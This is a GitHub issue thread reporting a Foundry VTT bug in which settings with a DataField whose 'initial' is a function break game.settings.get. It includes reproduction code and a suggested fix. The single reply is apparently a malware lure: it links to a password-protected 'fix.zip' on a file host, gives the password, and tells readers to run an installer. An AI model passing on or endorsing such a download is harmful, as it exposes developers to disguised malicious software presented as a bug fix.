### ISSUE TITLE
Settings registered with a `DataField` type that has a function for its `initial` and no default break setting retrieval

### ISSUE THREAD

**Issue by esheyw** [foundryvtt/foundryvtt#11629]
### What happened?

Trying to `game.settings.get()` such a setting produces an error: 
![](https://i.imgur.com/MiYP3VD.png)
This also blocks rendering of Configure Settings, see #11614

This is because in `game.settings.register`:
```js
if ( data.type instanceof foundry.data.fields.DataField ) {
  data.default ??= data.type.initial;
```
I think just changing to `data.default ??= data.type.getInitialValue()` would fix this.

### What ways of accessing Foundry can you encounter this issue in?

- [ ] Native App (Electron)
- [X] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other

### Reproduction Steps

Register a setting like so:
```js
game.settings.register(MODULE_ID, "initial-break-test", {
  type: new fields.StringField({
    initial: () => "I'm a function"
  }),
  config: true,
  name: "Initial Break Test",
  scope: "world",
});
```

### What core version are you reporting this for?

12.331

### Bug Checklist

- [ ] The issue occurs while all Modules are disabled

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
